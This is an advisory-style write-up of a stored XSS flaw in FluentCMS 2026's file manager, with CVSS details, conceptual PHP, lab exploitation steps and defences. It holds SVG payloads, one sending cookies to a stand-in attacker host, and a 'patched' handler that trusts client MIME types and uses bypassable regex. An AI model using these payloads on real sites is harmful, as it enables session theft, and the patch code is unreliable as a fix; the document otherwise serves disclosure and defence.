Executive Summary

CVE-2025-15549 is a stored Cross-Site Scripting (XSS) vulnerability in FluentCMS 2026. An authenticated administrator can upload a malicious SVG file containing embedded JavaScript through the File Management module. When any user (including other administrators or visitors) accesses the uploaded file URL, the JavaScript executes in their browser context. This can lead to session hijacking, credential theft, or defacement. The vulnerability has a CVSS score of 4.8 (Medium) and a public proof-of-concept (PoC) is available. A patch has been released by the vendor.

CVSS Breakdown & Threat Level

  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
  • Base Score: 4.8 (Medium)
  • Attack Vector (AV): Network (N) – The attack is exploitable remotely.
  • Attack Complexity (AC): Low (L) – No special conditions are required.
  • Privileges Required (PR): High (H) – The attacker must be an authenticated administrator.
  • User Interaction (UI): Required (R) – A user must access the malicious file URL.
  • Scope (S): Changed (C) – The vulnerability impacts resources beyond the vulnerable component.
  • Confidentiality (C): Low (L) – Limited information disclosure.
  • Integrity (I): Low (L) – Limited modification of data.
  • Availability (A): None (N) – No impact on availability.

Threat Level: Medium. Exploitation requires administrative privileges, but the impact can be significant if a high-privilege user (e.g., another admin) triggers the payload.

Deep Dive & Mechanics

The vulnerability resides in the File Management module of FluentCMS 2026. The application fails to properly validate or sanitize uploaded SVG files. SVG (Scalable Vector Graphics) files are XML-based and can contain <script> tags or event handlers (e.g., onload, onmouseover) that execute JavaScript.

Attack Flow:

  1. An authenticated administrator logs into FluentCMS.
  2. The attacker navigates to the File Management module.
  3. The attacker uploads a crafted SVG file containing malicious JavaScript (e.g., <script>alert('XSS')</script> or a payload to steal cookies).
  4. The application stores the SVG file on the server without sanitizing its content.
  5. The attacker obtains the URL to the uploaded SVG file (e.g., https://target.com/uploads/malicious.svg).
  6. The attacker lures another user (e.g., another admin or a visitor) into accessing the URL.
  7. The victim's browser renders the SVG, executing the embedded JavaScript.

Root Cause: Lack of content-type validation and missing sanitization of SVG file contents. The application should either block SVG uploads entirely or strip script elements and event handlers from SVG files.

Vulnerable vs. Patched Code

Vulnerable Code (Conceptual): The vulnerable code likely accepts any file upload without checking the MIME type or sanitizing the file content.

// Vulnerable upload handler
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadPath)) {
    // No validation of file content
    echo "File uploaded successfully.";
}

Patched Code (Conceptual): The patched code should validate the MIME type and sanitize SVG files by removing script elements and event handlers.

// Patched upload handler
$allowedMimeTypes = ['image/svg+xml', 'image/png', 'image/jpeg'];
if (in_array($_FILES['file']['type'], $allowedMimeTypes)) {
    if ($_FILES['file']['type'] === 'image/svg+xml') {
        $svgContent = file_get_contents($_FILES['file']['tmp_name']);
        // Remove script tags and event handlers
        $svgContent = preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', '', $svgContent);
        $svgContent = preg_replace('/\bon\w+\s*=\s*"[^"]*"/i', '', $svgContent);
        file_put_contents($uploadPath, $svgContent);
    } else {
        move_uploaded_file($_FILES['file']['tmp_name'], $uploadPath);
    }
    echo "File uploaded successfully.";
} else {
    echo "Invalid file type.";
}

Exploitation & Lab Setup

Red Team (Offensive)

Lab Setup:

  1. Install FluentCMS 2026 on a local server (e.g., using XAMPP or Docker).
  2. Create an administrator account.
  3. Log in as the administrator.

Exploitation Steps:

  1. Create a malicious SVG file named payload.svg with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <script type="text/javascript">
    alert('XSS');
  </script>
  <circle cx="50" cy="50" r="40" fill="red" />
</svg>
  1. Navigate to the File Management module.
  2. Upload payload.svg.
  3. Note the URL of the uploaded file (e.g., http://localhost/fluentcms/uploads/payload.svg).
  4. Send the URL to a victim (e.g., another admin) or access it yourself to trigger the XSS.

Advanced Payload (Cookie Stealing):

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <script type="text/javascript">
    var img = new Image();
    img.src = 'http://attacker.com/steal?cookie=' + document.cookie;
  </script>
  <circle cx="50" cy="50" r="40" fill="red" />
</svg>

Blue Team (Defensive)

Detection Steps:

  1. Monitor file upload logs for SVG files uploaded by administrators.
  2. Inspect uploaded SVG files for script tags or event handlers.
  3. Use a Web Application Firewall (WAF) to block malicious SVG uploads.
  4. Implement content security policy (CSP) headers to restrict script execution.

Mitigation Steps:

  1. Apply the vendor patch immediately.
  2. If patching is not possible, disable SVG uploads in the File Management module.
  3. Sanitize all uploaded SVG files using a library like DOMPurify (server-side).
  4. Restrict file upload permissions to only trusted administrators.
